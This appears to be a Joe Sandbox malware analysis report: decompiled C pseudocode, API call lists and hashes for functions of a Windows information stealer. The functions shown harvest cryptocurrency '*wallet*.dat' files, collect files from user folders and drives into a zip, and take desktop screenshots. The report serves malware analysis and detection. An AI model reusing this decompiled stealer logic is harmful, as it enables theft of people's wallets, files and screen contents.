                                                                    0x00409dd7
                                                                    0x00409ddc
                                                                    0x00409de6
                                                                    0x00409dea
                                                                    0x00409df2
                                                                    0x00409d46
                                                                    0x00409e1d
                                                                    0x00409e2a
                                                                    0x00409e32
                                                                    0x00409e53
                                                                    0x00409e5d
                                                                    0x00409e72
                                                                    0x00409e74
                                                                    0x00409e69
                                                                    0x00409e6a
                                                                    0x00409e6f
                                                                    0x00409e87

                                                                    APIs
                                                                    • lstrcatA.KERNEL32(?,\Files\), ref: 00409B4F
                                                                    • lstrcatA.KERNEL32(?), ref: 00409B5D
                                                                    • lstrcatA.KERNEL32(?,.zip), ref: 00409B6F
                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00409BAB
                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00409BD4
                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00409BFD
                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00409C26
                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00409C4F
                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00409C78
                                                                      • Part of subcall function 00416617: _memset.LIBCMT ref: 00416638
                                                                      • Part of subcall function 00416617: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00416650
                                                                      • Part of subcall function 00415E43: StrStrA.SHLWAPI(?,?,?,00000000,00409BA1,%APPDATA%,00000000), ref: 00415E4C
                                                                      • Part of subcall function 00415E43: lstrcpyn.KERNEL32(00446738,?,00000000,?,?,?,?,00000000,00409BA1,%APPDATA%,00000000), ref: 00415E65
                                                                      • Part of subcall function 00415E43: wsprintfA.USER32 ref: 00415E91
                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00409CA1
                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00409CCA
                                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00409D3A
                                                                    • GetDriveTypeA.KERNEL32(?,?,*%RECENT%*,00000000), ref: 00409D4D
                                                                    • lstrcpy.KERNEL32(?,?), ref: 00409D6E
                                                                    • lstrcpy.KERNEL32(?,?), ref: 00409D8A
                                                                      • Part of subcall function 00409A8B: _strtok_s.LIBCMT ref: 00409A9D
                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00409DAB
                                                                    • lstrlen.KERNEL32(?,?,?,*%RECENT%*,00000000), ref: 00409DE0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcpy$lstrcat$Drive$FolderLogicalPathStringsType_memset_strtok_slstrcpynlstrlenwsprintf
                                                                    • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%DRIVE_FIXED%$%DRIVE_REMOVABLE%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$*%RECENT%*$.zip$\Files\
                                                                    • API String ID: 1204426253-175588422
                                                                    • Opcode ID: 5c59b50aa2487a3c505819ff58e6b0f6e514b940e7d510e51a5cd5a90db8f4c6
                                                                    • Instruction ID: 21c95b79e929c0167f989c4314e32640226bd38830f19e0ff31c6e1aa12e6311
                                                                    • Opcode Fuzzy Hash: 5c59b50aa2487a3c505819ff58e6b0f6e514b940e7d510e51a5cd5a90db8f4c6
                                                                    • Instruction Fuzzy Hash: 65A17272900218AFEB15DBA1DC85EDEB7BCEB49310F1041ABF509A2181EF346F848F59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040C955 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 149stringfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 63%
                                                                    			E0040C955(CHAR* __ecx, void* __edx, void* __esi, CHAR* _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v804;
				char _v1068;
				struct _WIN32_FIND_DATAA _v1388;
				CHAR* _v1392;
				void* _v1396;
				CHAR* _v1400;
				intOrPtr _v1404;
				CHAR* _v1408;
				void* __ebx;
				void* __edi;
				signed int _t49;
				char* _t54;
				CHAR* _t59;
				int _t63;
				signed char _t76;
				char* _t77;
				void* _t99;
				void* _t103;
				void* _t105;
				CHAR* _t106;
				signed int _t108;
				void* _t109;
				void* _t110;

				_t107 = __esi;
				_t105 = __edx;
				_t49 =  *0x443674; // 0x393162b1
				_v8 = _t49 ^ _t108;
				_v1408 = _a4;
				_v1400 = _a8;
				_t106 = __ecx;
				_v1404 = _a12;
				_v1392 = __ecx;
				_t99 = 0x104;
				_t54 =  &_v540;
				do {
					 *_t54 = 0;
					_t54 = _t54 + 1;
					_t99 = _t99 - 1;
				} while (_t99 != 0);
				lstrcatA( &_v540, E00416617(0, __ecx, __esi, 0x1a));
				_push(_t106);
				_push( &_v540);
				_t59 =  &_v1068;
				if(_a16 == 0) {
					_push("%s\\%s\\*wallet*.dat");
				} else {
					_push("%s\\%s\\*");
				}
				wsprintfA(_t59, ??);
				_t110 = _t109 + 0x10;
				_t63 = FindFirstFileA( &_v1068,  &_v1388);
				_v1396 = _t63;
				if(_t63 != 0xffffffff) {
					_t106 = 0x43c8e0;
					do {
						_push(".");
						_push( &(_v1388.cFileName));
						if( *0x446458() != 0) {
							_push("..");
							_push( &(_v1388.cFileName));
							if( *0x446458() != 0) {
								if(_a16 == 0) {
									wsprintfA( &_v804, "%s\\%s\\%s",  &_v540, _v1392,  &(_v1388.cFileName));
									_t110 = _t110 + 0x14;
								} else {
									wsprintfA( &_v804, "%s\\%s\\%s\\%s",  &_v540, _v1392,  &(_v1388.cFileName), _v1400);
									_t110 = _t110 + 0x18;
								}
								_t76 = GetFileAttributesA( &_v804);
								if(_t76 != 0xffffffff && (_t76 & 0x00000010) == 0) {
									_t103 = 0x104;
									_t77 =  &_v276;
									do {
										 *_t77 = 0;
										_t77 = _t77 + 1;
										_t103 = _t103 - 1;
									} while (_t103 != 0);
									lstrcatA( &_v276, "\\Wallets\\");
									lstrcatA( &_v276, _v1408);
									lstrcatA( &_v276, _t106);
									lstrcatA( &_v276,  &(_v1388.cFileName));
									if(_a16 != 0) {
										lstrcatA( &_v276, _t106);
										lstrcatA( &_v276, _v1400);
									}
									E0041CE7C(_v1404,  &_v276, 0, 2);
									_t110 = _t110 + 0xc;
								}
							}
						}
					} while (FindNextFileA(_v1396,  &_v1388) != 0);
					_t63 = FindClose(_v1396);
				}
				return E0041DA9B(_t63, 0, _v8 ^ _t108, _t105, _t106, _t107);
			}





























                                                                    0x0040c955
                                                                    0x0040c955
                                                                    0x0040c95e
                                                                    0x0040c965
                                                                    0x0040c96b
                                                                    0x0040c975
                                                                    0x0040c97f
                                                                    0x0040c981
                                                                    0x0040c987
                                                                    0x0040c98d
                                                                    0x0040c992
                                                                    0x0040c99a
                                                                    0x0040c99a
                                                                    0x0040c99c
                                                                    0x0040c99d
                                                                    0x0040c99d
                                                                    0x0040c9b0
                                                                    0x0040c9bc
                                                                    0x0040c9bd
                                                                    0x0040c9be
                                                                    0x0040c9c7
                                                                    0x0040c9d0
                                                                    0x0040c9c9
                                                                    0x0040c9c9
                                                                    0x0040c9c9
                                                                    0x0040c9d6
                                                                    0x0040c9dc
                                                                    0x0040c9ed
                                                                    0x0040c9f3
                                                                    0x0040c9fc
                                                                    0x0040ca02
                                                                    0x0040ca07
                                                                    0x0040ca07
                                                                    0x0040ca12
                                                                    0x0040ca1b
                                                                    0x0040ca21
                                                                    0x0040ca2c
                                                                    0x0040ca35
                                                                    0x0040ca44
                                                                    0x0040ca8b
                                                                    0x0040ca91
                                                                    0x0040ca46
                                                                    0x0040ca66
                                                                    0x0040ca6c
                                                                    0x0040ca6c
                                                                    0x0040ca9b
                                                                    0x0040caa4
                                                                    0x0040cab2
                                                                    0x0040cab7
                                                                    0x0040cabd
                                                                    0x0040cabd
                                                                    0x0040cabf
                                                                    0x0040cac0
                                                                    0x0040cac0
                                                                    0x0040cacf
                                                                    0x0040cae2
                                                                    0x0040caf0
                                                                    0x0040cb04
                                                                    0x0040cb0d
                                                                    0x0040cb17
                                                                    0x0040cb2a
                                                                    0x0040cb2a
                                                                    0x0040cb46
                                                                    0x0040cb4b
                                                                    0x0040cb4b
                                                                    0x0040caa4
                                                                    0x0040ca35
                                                                    0x0040cb61
                                                                    0x0040cb6f
                                                                    0x0040cb6f
                                                                    0x0040cb82

                                                                    APIs
                                                                    • lstrcatA.KERNEL32(?,00000000,0043C8D8,00000000), ref: 0040C9B0
                                                                    • wsprintfA.USER32 ref: 0040C9D6
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 0040C9ED
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC4), ref: 0040CA13
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC8), ref: 0040CA2D
                                                                    • wsprintfA.USER32 ref: 0040CA66
                                                                    • wsprintfA.USER32 ref: 0040CA8B
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 0040CA9B
                                                                    • lstrcatA.KERNEL32(?,\Wallets\), ref: 0040CACF
                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040CAE2
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 0040CAF0
                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040CB04
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 0040CB17
                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040CB2A
                                                                    • FindNextFileA.KERNEL32(?,?), ref: 0040CB5B
                                                                    • FindClose.KERNEL32(?), ref: 0040CB6F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$FileFindwsprintf$AttributesCloseFirstNext
                                                                    • String ID: %s\%s\%s$%s\%s\%s\%s$%s\%s\*$%s\%s\*wallet*.dat$\Bitcoin\wallets\$\Wallets\
                                                                    • API String ID: 1844104990-3932732945
                                                                    • Opcode ID: cfc2154e3ba82c94969940e75d31b676d302d60417567deeec0d77c9a0d8ffbd
                                                                    • Instruction ID: c730f20c59e2f6996738c63aaf29f5c539468badf739dfc3d46299cfe8c5801a
                                                                    • Opcode Fuzzy Hash: cfc2154e3ba82c94969940e75d31b676d302d60417567deeec0d77c9a0d8ffbd
                                                                    • Instruction Fuzzy Hash: 2E512D71D0011CAFCF21DFA4DC89EDABBBCBB09311F4005A6E519E2190DB349A898F59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00408B15 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 115filestringmemoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 63%
                                                                    			E00408B15(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t35;
				void* _t47;
				intOrPtr _t49;
				char* _t56;
				void* _t59;
				intOrPtr _t75;
				void* _t80;
				intOrPtr _t82;
				void* _t83;
				void* _t84;
				void* _t85;

				_push(0x570);
				E0042083E(E00434B70, __ebx, __edi, __esi);
				_t82 = __ecx;
				 *((intOrPtr*)(_t83 - 0x578)) = __ecx;
				 *((intOrPtr*)(_t83 - 4)) = 0;
				_t80 = HeapAlloc(GetProcessHeap(), 0, 0x98967f);
				 *((intOrPtr*)(_t83 - 0x57c)) = _t80;
				wsprintfA(_t83 - 0x328, "%s\\*", _t82);
				_t85 = _t84 + 0xc;
				_t35 = FindFirstFileA(_t83 - 0x328, _t83 - 0x570);
				 *(_t83 - 0x574) = _t35;
				if(_t35 != 0xffffffff) {
					_t82 = 0x104;
					do {
						_push(".");
						_push(_t83 - 0x544);
						if( *0x446458() != 0) {
							_push("..");
							_push(_t83 - 0x544);
							if( *0x446458() != 0) {
								wsprintfA(_t83 - 0x430, "%s\\%s",  *((intOrPtr*)(_t83 - 0x578)), _t83 - 0x544);
								_t85 = _t85 + 0x10;
								_t75 = _t82;
								_t56 = _t83 - 0x118;
								do {
									 *_t56 = 0;
									_t56 = _t56 + 1;
									_t75 = _t75 - 1;
									_t92 = _t75;
								} while (_t75 != 0);
								lstrcatA(_t83 - 0x118,  *0x445fe0);
								_t59 = 0x1a;
								lstrcatA(_t83 - 0x118, E00415EF6(_t59, _t92));
								CopyFileA(_t83 - 0x430, _t83 - 0x118, 1);
								_push(_t80);
								_push(_t83 - 0x118);
								E0040878A(0, _t80, _t82, _t92);
								DeleteFileA(_t83 - 0x118);
							}
						}
					} while (FindNextFileA( *(_t83 - 0x574), _t83 - 0x570) != 0);
					FindClose( *(_t83 - 0x574));
					E00426300(_t83 - 0x220, 0, _t82);
					lstrcatA(_t83 - 0x220,  *0x446198);
					_t47 =  *0x446320(_t80);
					_t49 =  *0x4461f0; // 0x0
					E0041CE7C(_t49, _t83 - 0x220, _t47, 3);
				}
				E00404354(_t83 + 8, 1, 0);
				return E00420888(0, _t80, _t82);
			}














                                                                    0x00408b15
                                                                    0x00408b1f
                                                                    0x00408b24
                                                                    0x00408b26
                                                                    0x00408b34
                                                                    0x00408b44
                                                                    0x00408b53
                                                                    0x00408b59
                                                                    0x00408b5f
                                                                    0x00408b70
                                                                    0x00408b76
                                                                    0x00408b7f
                                                                    0x00408b85
                                                                    0x00408b8a
                                                                    0x00408b8a
                                                                    0x00408b95
                                                                    0x00408b9e
                                                                    0x00408ba4
                                                                    0x00408baf
                                                                    0x00408bb8
                                                                    0x00408bd7
                                                                    0x00408bdd
                                                                    0x00408be0
                                                                    0x00408be2
                                                                    0x00408be8
                                                                    0x00408be8
                                                                    0x00408bea
                                                                    0x00408beb
                                                                    0x00408beb
                                                                    0x00408beb
                                                                    0x00408bfb
                                                                    0x00408c03
                                                                    0x00408c11
                                                                    0x00408c27
                                                                    0x00408c33
                                                                    0x00408c34
                                                                    0x00408c35
                                                                    0x00408c43
                                                                    0x00408c43
                                                                    0x00408bb8
                                                                    0x00408c5c
                                                                    0x00408c6a
                                                                    0x00408c79
                                                                    0x00408c8e
                                                                    0x00408c95
                                                                    0x00408ca5
                                                                    0x00408cac
                                                                    0x00408cb1
                                                                    0x00408cba
                                                                    0x00408cc4

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00408B1F
                                                                    • GetProcessHeap.KERNEL32(00000000,0098967F,00000570,00408FA7,?), ref: 00408B37
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00408B3E
                                                                    • wsprintfA.USER32 ref: 00408B59
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00408B70
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC4), ref: 00408B96
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC8), ref: 00408BB0
                                                                    • wsprintfA.USER32 ref: 00408BD7
                                                                    • lstrcatA.KERNEL32(?), ref: 00408BFB
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00408C11
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00408C27
                                                                    • DeleteFileA.KERNEL32(?), ref: 00408C43
                                                                    • FindNextFileA.KERNEL32(?,?), ref: 00408C56
                                                                    • FindClose.KERNEL32(?), ref: 00408C6A
                                                                    • _memset.LIBCMT ref: 00408C79
                                                                    • lstrcatA.KERNEL32(?), ref: 00408C8E
                                                                    • lstrlen.KERNEL32(00000000), ref: 00408C95
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Findlstrcat$Heapwsprintf$AllocCloseCopyDeleteFirstH_prolog3_NextProcess_memsetlstrlen
                                                                    • String ID: %s\%s$%s\*
                                                                    • API String ID: 1287371050-2848263008
                                                                    • Opcode ID: 1ae9ea9de5455d4ad3dbb689f750792ff62452196413e4dfcd83fc00011786b8
                                                                    • Instruction ID: 0219aadeec5eea91d065dd2822f6c54c25061509eaa94e994f3012464786fefd
                                                                    • Opcode Fuzzy Hash: 1ae9ea9de5455d4ad3dbb689f750792ff62452196413e4dfcd83fc00011786b8
                                                                    • Instruction Fuzzy Hash: B44133B5900118AFDF10ABA0EC49EDB777CFB0A755F0400AAF509E2191DB349A848F59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004101E9 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 177fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 57%
                                                                    			E004101E9(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v804;
				struct _WIN32_FIND_DATAA _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
				void* _v1148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t64;
				intOrPtr _t67;
				int _t72;
				void* _t89;
				signed char _t93;
				signed int _t95;
				signed int _t97;
				intOrPtr _t104;
				char* _t107;
				char* _t120;
				intOrPtr _t123;
				intOrPtr _t124;
				signed int _t125;
				void* _t126;
				void* _t127;

				_t122 = __edx;
				_t64 =  *0x443674; // 0x393162b1
				_v8 = _t64 ^ _t125;
				_t110 = _a16;
				_t124 = _a12;
				_t123 = _a24;
				_v1136 = _a4;
				_t67 = _a8;
				_v1144 = _t67;
				_v1132 = __ecx;
				_v1140 = _a16;
				_v1128 = _a20;
				wsprintfA( &_v804, "%s\\*", _t67);
				_t127 = _t126 + 0xc;
				_t72 = FindFirstFileA( &_v804,  &_v1124);
				_v1148 = _t72;
				if(_t72 != 0xffffffff) {
					do {
						_push(".");
						_push( &(_v1124.cFileName));
						if( *0x446458() != 0) {
							_push("..");
							_push( &(_v1124.cFileName));
							if( *0x446458() != 0) {
								E0041EE84( &_v276, "%s\\%s", _v1144);
								E00426300( &_v540, 0, 0x104);
								wsprintfA( &_v540, "%s\\%s\\%s\\%s", _v1144,  &(_v1124.cFileName),  *0x446044,  *0x445a80);
								_t127 = _t127 + 0x34;
								_t89 =  *0x446458( &(_v1124.cFileName),  *0x445cc0,  &(_v1124.cFileName));
								_t132 = _t89;
								if(_t89 != 0) {
									__eflags =  *0x446458( &(_v1124.cFileName),  *0x445a80);
									if(__eflags != 0) {
										_t93 = GetFileAttributesA( &_v540);
										__eflags = _t93 - 0xffffffff;
										if(_t93 == 0xffffffff) {
											L11:
											_t95 =  *0x446458( &(_v1124.cFileName),  *0x445d50);
											__eflags = _t95;
											if(_t95 != 0) {
												_t97 =  *0x446458( &(_v1124.cFileName),  *0x445b04);
												__eflags = _t97;
												if(_t97 != 0) {
													__eflags = _v1124.dwFileAttributes & 0x00000010;
													if((_v1124.dwFileAttributes & 0x00000010) != 0) {
														goto L19;
													}
												} else {
													__eflags =  *((char*)(_v1132 + 1));
													if(__eflags != 0) {
														E0040F094(_t110,  &_v276, _t123, _t124, __eflags, _v1136, _t124, _t110, _v1128, _t123);
														E0040F346( &_v276, _v1136, _t124, _t123);
														goto L14;
													}
													goto L19;
												}
											} else {
												_t104 = _v1132;
												__eflags =  *((char*)(_t104 + 2));
												if( *((char*)(_t104 + 2)) != 0) {
													E0040F505( &_v276, _v1136, _t124, _t123);
													E0040F6A9( &_v276, _v1136, _t124, _t123);
													L14:
													_t110 = _v1140;
												}
												goto L19;
											}
										} else {
											__eflags = _t93 & 0x00000010;
											if(__eflags != 0) {
												goto L11;
											} else {
												_t107 =  &_v540;
												_t120 =  &(_v1124.cFileName);
												goto L7;
											}
										}
									} else {
										_t120 = _v1136;
										_t107 =  &_v276;
										L7:
										_t122 = _t124;
										E0040EC59(_t110, _t120, _t124, _t123, _t124, __eflags, _t107, _t110, _v1128, _t123);
										goto L19;
									}
								} else {
									E0040E9B8(_t110,  &_v276, _t123, _t124, _t132, _t124, _t110, _v1128);
									L19:
									E004101E9(_v1132, _t122,  &(_v1124.cFileName),  &_v276, _t124, _t110, _v1128, _t123);
								}
							}
						}
					} while (FindNextFileA(_v1148,  &_v1124) != 0);
					_t72 = FindClose(_v1148);
				}
				return E0041DA9B(_t72, _t110, _v8 ^ _t125, _t122, _t123, _t124);
			}

































                                                                    0x004101e9
                                                                    0x004101f2
                                                                    0x004101f9
                                                                    0x00410200
                                                                    0x00410204
                                                                    0x00410208
                                                                    0x0041020b
                                                                    0x00410211
                                                                    0x00410215
                                                                    0x0041021b
                                                                    0x00410230
                                                                    0x00410236
                                                                    0x0041023c
                                                                    0x00410242
                                                                    0x00410253
                                                                    0x00410259
                                                                    0x00410262
                                                                    0x00410268
                                                                    0x00410268
                                                                    0x00410273
                                                                    0x0041027c
                                                                    0x00410282
                                                                    0x0041028d
                                                                    0x00410296
                                                                    0x004102b5
                                                                    0x004102c8
                                                                    0x004102f5
                                                                    0x004102fb
                                                                    0x0041030b
                                                                    0x00410311
                                                                    0x00410313
                                                                    0x00410340
                                                                    0x00410342
                                                                    0x0041036c
                                                                    0x00410372
                                                                    0x00410375
                                                                    0x00410389
                                                                    0x00410396
                                                                    0x0041039c
                                                                    0x0041039e
                                                                    0x004103e7
                                                                    0x004103ed
                                                                    0x004103ef
                                                                    0x0041042c
                                                                    0x00410433
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004103f1
                                                                    0x004103f7
                                                                    0x004103fb
                                                                    0x00410412
                                                                    0x00410425
                                                                    0x00000000
                                                                    0x00410425
                                                                    0x00000000
                                                                    0x004103fb
                                                                    0x004103a0
                                                                    0x004103a0
                                                                    0x004103a6
                                                                    0x004103aa
                                                                    0x004103be
                                                                    0x004103cd
                                                                    0x004103d2
                                                                    0x004103d2
                                                                    0x004103d2
                                                                    0x00000000
                                                                    0x004103aa
                                                                    0x00410377
                                                                    0x00410377
                                                                    0x00410379
                                                                    0x00000000
                                                                    0x0041037b
                                                                    0x0041037b
                                                                    0x00410381
                                                                    0x00000000
                                                                    0x00410381
                                                                    0x00410379
                                                                    0x00410344
                                                                    0x00410344
                                                                    0x0041034a
                                                                    0x00410350
                                                                    0x00410357
                                                                    0x0041035b
                                                                    0x00000000
                                                                    0x0041035b
                                                                    0x00410315
                                                                    0x00410323
                                                                    0x00410435
                                                                    0x00410452
                                                                    0x00410452
                                                                    0x00410313
                                                                    0x00410296
                                                                    0x0041046a
                                                                    0x00410478
                                                                    0x00410478
                                                                    0x0041048c

                                                                    APIs
                                                                    • wsprintfA.USER32 ref: 0041023C
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00410253
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC4), ref: 00410274
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC8), ref: 0041028E
                                                                    • _sprintf.LIBCMT ref: 004102B5
                                                                    • _memset.LIBCMT ref: 004102C8
                                                                    • wsprintfA.USER32 ref: 004102F5
                                                                    • StrCmpCA.SHLWAPI(?), ref: 0041030B
                                                                    • StrCmpCA.SHLWAPI(?), ref: 0041033A
                                                                      • Part of subcall function 0040E9B8: __EH_prolog3_GS.LIBCMT ref: 0040E9C2
                                                                      • Part of subcall function 0040E9B8: _memset.LIBCMT ref: 0040E9E9
                                                                      • Part of subcall function 0040E9B8: lstrcatA.KERNEL32(?,?,?,?), ref: 0040E9FE
                                                                      • Part of subcall function 0040E9B8: lstrcatA.KERNEL32(?,00000000), ref: 0040EA14
                                                                      • Part of subcall function 0040E9B8: CopyFileA.KERNEL32(?,?,00000001), ref: 0040EA24
                                                                      • Part of subcall function 0040E9B8: StrCmpCA.SHLWAPI(?,0043C8D8), ref: 0040EB07
                                                                      • Part of subcall function 0040E9B8: StrCmpCA.SHLWAPI(00000000,0043C8D8), ref: 0040EB13
                                                                    • FindNextFileA.KERNEL32(?,?), ref: 00410464
                                                                    • FindClose.KERNEL32(?), ref: 00410478
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileFind$_memsetlstrcatwsprintf$CloseCopyFirstH_prolog3_Next_sprintf
                                                                    • String ID: %s\%s$%s\%s\%s\%s$%s\*
                                                                    • API String ID: 166131113-3933763253
                                                                    • Opcode ID: e0c73e2ef28e50aa6f66c2d223931159302e3954ac875876c2766596e9b71bf3
                                                                    • Instruction ID: 9bca9961ce39c9fd88c96c55bbcb497666ecec60079e0324722dba36a41e37c6
                                                                    • Opcode Fuzzy Hash: e0c73e2ef28e50aa6f66c2d223931159302e3954ac875876c2766596e9b71bf3
                                                                    • Instruction Fuzzy Hash: 87713FB090022DAFCF21DF61CC88EDA7B7CBB46304F4405EAA608A2151E7759AC5CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004166F5 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 129windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 17%
                                                                    			E004166F5(void* __edx) {
				signed int _v8;
				char _v24;
				struct tagRECT _v40;
				struct HDC__* _v44;
				char _v48;
				void* _v52;
				void* _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				char _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				intOrPtr _t37;
				struct HDC__* _t49;
				void* _t51;
				int _t61;
				void* _t72;
				void* _t77;
				signed int _t82;

				_t77 = __edx;
				_t35 =  *0x443674; // 0x393162b1
				_v8 = _t35 ^ _t82;
				_t37 =  *0x4461f0; // 0x0
				_v64 = _t37;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t81 = 0;
				_push(0);
				_push( &_v88);
				_t80 = 1;
				_push( &_v68);
				_v88 = 1;
				if( *0x446434() == 0) {
					_push( &_v60);
					_push(1);
					_push(0);
					if( *0x446394() == 0) {
						_t80 = GetDesktopWindow();
						GetWindowRect(_t80,  &_v40);
						_t49 = GetDC(_t80);
						_v44 = _t49;
						_t72 = CreateCompatibleDC(_t49);
						_t51 = CreateCompatibleBitmap(_v44, _v40.right, _v40.bottom);
						_v56 = _t51;
						_v72 = SelectObject(_t72, _t51);
						BitBlt(_t72, 0, 0, _v40.right, _v40.bottom, _v44, 0, 0, 0xcc0020);
						_push( &_v48);
						_push(0);
						_push(_v56);
						if( *0x4463f4() == 0 && E00416670(0,  &_v24) != 0xffffffff) {
							_push(0);
							_push( &_v24);
							_push(_v60);
							_push(_v48);
							if( *0x4463c8() == 0) {
								_t61 =  *0x446290(_v60,  &_v52);
								GlobalFix(_v52);
								_t81 = _t61;
								E0041CE7C(_v64, "\\screenshot.jpg", GlobalSize(_v52), 3);
								SelectObject(_t72, _v72);
								 *0x446308(_v48);
								 *0x446414(_v68);
								DeleteObject(_v56);
								DeleteObject(_t72);
								ReleaseDC(_t80, _v44);
								CloseWindow(_t80);
							}
						}
					}
				}
				return E0041DA9B(0, _t72, _v8 ^ _t82, _t77, _t80, _t81);
			}


























                                                                    0x004166f5
                                                                    0x004166fb
                                                                    0x00416702
                                                                    0x00416705
                                                                    0x0041670d
                                                                    0x00416715
                                                                    0x00416716
                                                                    0x00416717
                                                                    0x00416718
                                                                    0x00416719
                                                                    0x0041671b
                                                                    0x0041671f
                                                                    0x00416725
                                                                    0x00416726
                                                                    0x00416727
                                                                    0x00416732
                                                                    0x0041673b
                                                                    0x0041673c
                                                                    0x0041673d
                                                                    0x00416746
                                                                    0x00416752
                                                                    0x00416759
                                                                    0x00416760
                                                                    0x00416767
                                                                    0x00416773
                                                                    0x0041677b
                                                                    0x00416783
                                                                    0x00416796
                                                                    0x004167a2
                                                                    0x004167ab
                                                                    0x004167ac
                                                                    0x004167ad
                                                                    0x004167b8
                                                                    0x004167d1
                                                                    0x004167d5
                                                                    0x004167d6
                                                                    0x004167d9
                                                                    0x004167e4
                                                                    0x004167ed
                                                                    0x004167f6
                                                                    0x004167ff
                                                                    0x00416814
                                                                    0x00416820
                                                                    0x00416829
                                                                    0x00416832
                                                                    0x0041683b
                                                                    0x00416842
                                                                    0x0041684c
                                                                    0x00416853
                                                                    0x00416853
                                                                    0x004167e4
                                                                    0x004167b8
                                                                    0x00416746
                                                                    0x00416869

                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 0041674C
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00416759
                                                                    • GetDC.USER32(00000000), ref: 00416760
                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0041676A
                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0041677B
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00416786
                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004167A2
                                                                    • GlobalFix.KERNEL32(?), ref: 004167F6
                                                                    • GlobalSize.KERNEL32(?), ref: 00416801
                                                                    • SelectObject.GDI32(00000000,?), ref: 00416820
                                                                    • DeleteObject.GDI32(00000001), ref: 0041683B
